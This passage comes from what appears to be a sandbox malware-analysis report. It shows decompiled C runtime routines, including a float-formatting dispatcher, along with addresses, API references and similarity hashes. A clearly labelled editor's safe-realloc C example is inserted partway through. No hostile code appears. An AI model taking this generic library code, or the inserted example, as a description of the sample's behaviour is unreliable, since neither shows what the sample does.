                      Addresses of the listing above, one per C-code line (the report renders these as a side column): 0x009350e4, 0x009350f2, 0x009350f5, 0x009350f7, 0x00935106, 0x00935139, 0x00935139, 0x0093513c, 0x00000000, 0x00000000, 0x00935109, 0x0093510b, 0x0093510d, 0x0093510d, 0x0093510d, 0x0093511a, 0x00935120, 0x00935122, 0x00935124, 0x00935184, 0x00935184, 0x00935126, 0x00935126, 0x0093512c, 0x0093516e, 0x00935182, 0x00000000, 0x0093512e, 0x00935135, 0x00935137, 0x00935156, 0x0093516a, 0x00935150, 0x00935150, 0x00935150, 0x00000000, 0x00000000, 0x00000000, 0x00935137, 0x0093512c, 0x00000000, 0x00935152, 0x0093513f, 0x0093514a, 0x00000000, 0x009350f9, 0x009350fc, 0x00935102, 0x00935102, 0x00935153, 0x00935155, 0x009350e6, 0x009350f0, 0x009350f0

                      APIs
                      • _free.LIBCMT ref: 009350FC
                        • Part of subcall function 0093504B: __FF_MSGBANNER.LIBCMT ref: 00935062
                        • Part of subcall function 0093504B: __NMSG_WRITE.LIBCMT ref: 00935069
                        • Part of subcall function 0093504B: HeapAlloc.KERNEL32(00830000,00000000,00000001,00000000,00000000,00000000,?,009335E3,00000000,00000000,00000000,00000000,?,00933498,00000018,00941F40), ref: 0093508E
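Added example (editor's code, not part of the report and not recovered from the sample): the realloc listing above has three special cases that callers routinely get wrong. A NULL block acts as malloc, a zero size frees the block and returns NULL (so `p = realloc(p, 0)` leaves a dangling pointer that a later free() hits twice), and any request over 0xffffffe0 fails with ENOMEM. The wrapper below, in C for a native-code audience, keeps the same cap but turns the silent-free and element-count-overflow cases into explicit errors and never discards the caller's pointer on failure. The names safe_realloc_array, probe_reject, demo and the HEAP_MAXREQ macro are this example's own, and the "hello" payload is constructed for the demonstration.

```c
#include <errno.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Upper bound on a single request. The listing above rejects sizes above
 * 0xffffffe0 with errno 0xc (ENOMEM); the name HEAP_MAXREQ is this example's
 * own, chosen to mirror that check, not a symbol recovered from the sample. */
#define HEAP_MAXREQ ((size_t)0xffffffe0u)

/* Grow *pp to hold count elements of size bytes each.
 * Unlike the raw CRT routine it:
 *   - refuses count == 0 / size == 0 instead of silently freeing *pp and
 *     returning NULL (the realloc(p, 0) path, E0093354D in the listing);
 *   - rejects count * size overflow before trusting the product;
 *   - leaves *pp untouched on failure, so the usual p = realloc(p, n)
 *     pattern cannot lose the caller's block.
 * Returns 0 on success, -1 with errno set on failure. */
int safe_realloc_array(void **pp, size_t count, size_t size)
{
    if (pp == NULL || count == 0 || size == 0) {
        errno = EINVAL;
        return -1;
    }
    if (count > SIZE_MAX / size) {      /* multiplication would wrap */
        errno = ENOMEM;
        return -1;
    }
    size_t bytes = count * size;
    if (bytes > HEAP_MAXREQ) {          /* same cap the CRT enforces */
        errno = ENOMEM;
        return -1;
    }
    void *q = realloc(*pp, bytes);      /* *pp == NULL behaves as malloc */
    if (q == NULL) {
        errno = ENOMEM;
        return -1;
    }
    *pp = q;
    return 0;
}

/* Issue one request that is expected to be rejected and report the errno it
 * produced; returns 0 (after freeing the block) if it unexpectedly succeeded. */
int probe_reject(size_t count, size_t size)
{
    void *p = NULL;
    errno = 0;
    if (safe_realloc_array(&p, count, size) == 0) {
        free(p);
        return 0;
    }
    return errno;
}

/* Grow a buffer, then make an overflowing request and confirm that the
 * original block, and the data in it, survived the failure.
 * Returns 0 on success, -1 on any deviation. */
int demo(void)
{
    char *buf = NULL;
    if (safe_realloc_array((void **)&buf, 16, 1) != 0)
        return -1;
    memcpy(buf, "hello", 6);                       /* constructed payload */

    char *before = buf;
    int rc = safe_realloc_array((void **)&buf, SIZE_MAX / 2 + 1, 2);
    int intact = (rc == -1 && errno == ENOMEM && buf == before
                  && strcmp(buf, "hello") == 0);

    free(buf);
    return intact ? 0 : -1;
}

int main(void)
{
    return demo() == 0 ? 0 : 1;
}
```

Build with any C11 compiler (`cc -std=c11 -Wall safe_realloc.c`); the process exits 0 when the overflow request is refused and the original block is still intact. The HEAP_MAXREQ test only differs from the overflow test on 64-bit builds, where a 4 GiB request is representable but still refused, which is exactly the case the CRT's 0xffffffe0 comparison covers.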
                      Memory Dump Source
                      • Source File: 00000000.00000002.270957240.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000000.00000002.270954040.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.270971167.000000000093E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271007675.0000000000943000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271021541.0000000000957000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271024856.0000000000959000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271028191.000000000095A000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_930000_vy3mvlAaCZ.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocHeap_free
                      • String ID:
                      • API String ID: 1080816511-0
                      • Opcode ID: 4e5497515bac27710266de0d8def36d40164f46e9fdef71d6a7b4b78a454c233
                      • Instruction ID: 66ca754cbe2658e29ae2166be16f2f03a63d94938edd94198ad954fc84bbb040
                      • Opcode Fuzzy Hash: 4e5497515bac27710266de0d8def36d40164f46e9fdef71d6a7b4b78a454c233
                      • Instruction Fuzzy Hash: 0811C27280CA11ABCF342FF5AC0576A3B98AF48360F134925F8099B1A1DE74D9809E94
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      Identification (inferred from the dispatch structure and the API ID line below, which names __cftoe_l, __cftof_l and __cftog_l): this is the CRT _cfltcvt_l dispatcher used by printf-family floating-point formatting. _a16 is the conversion character: 'e' / 'E' (0x65 / 0x45) go to E0093938E (__cftoe_l), 'f' (0x66) to E00939548 (__cftof_l, which takes no case flag and is therefore called without _a24), 'a' / 'A' (0x61 / 0x41) to E00938EC3 (presumably the hexadecimal-float converter, which the report does not name), and everything else to E00939609 (__cftog_l). Library code, not sample-specific logic.
                      			E00938E3D(void* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                      				intOrPtr _t25;
                      				void* _t26;
                      
                      				_t25 = _a16;
                      				if(_t25 == 0x65 || _t25 == 0x45) {
                      					_t26 = E0093938E(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                      					goto L9;
                      				} else {
                      					_t35 = _t25 - 0x66;
                      					if(_t25 != 0x66) {
                      						__eflags = _t25 - 0x61;
                      						if(_t25 == 0x61) {
                      							L7:
                      							_t26 = E00938EC3(_a4, _a8, _a12, _a20, _a24, _a28);
                      						} else {
                      							__eflags = _t25 - 0x41;
                      							if(__eflags == 0) {
                      								goto L7;
                      							} else {
                      								_t26 = E00939609(__edx, __esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                      							}
                      						}
                      						L9:
                      						return _t26;
                      					} else {
                      						return E00939548(__edx, __esi, _t35, _a4, _a8, _a12, _a20, _a28);
                      					}
                      				}
                      			}
                      Addresses of the listing above, one per C-code line (the report renders these as a side column): 0x00938e40, 0x00938e46, 0x00938eb9, 0x00000000, 0x00938e4d, 0x00938e4d, 0x00938e50, 0x00938e6b, 0x00938e6e, 0x00938e8e, 0x00938ea0, 0x00938e70, 0x00938e70, 0x00938e73, 0x00000000, 0x00938e75, 0x00938e87, 0x00938e87, 0x00938e73, 0x00938ebe, 0x00938ec2, 0x00938e52, 0x00938e6a, 0x00938e6a, 0x00938e50

                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.270957240.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000000.00000002.270954040.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.270971167.000000000093E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271007675.0000000000943000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271021541.0000000000957000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271024856.0000000000959000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271028191.000000000095A000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_930000_vy3mvlAaCZ.jbxd
                      Yara matches
                      Similarity
                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                      • String ID:
                      • API String ID: 3016257755-0
                      • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                      • Instruction ID: e33522001c63742a456b874a3062a45355bf9244ec0b36b4835526fe078c14f9
                      • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                      • Instruction Fuzzy Hash: 09014B7240424EBBCF266E84DC41DEE3F66BB58354F588415FE1858131D736C9B1AF82
                      Uniqueness

                      Uniqueness Score: -1.00%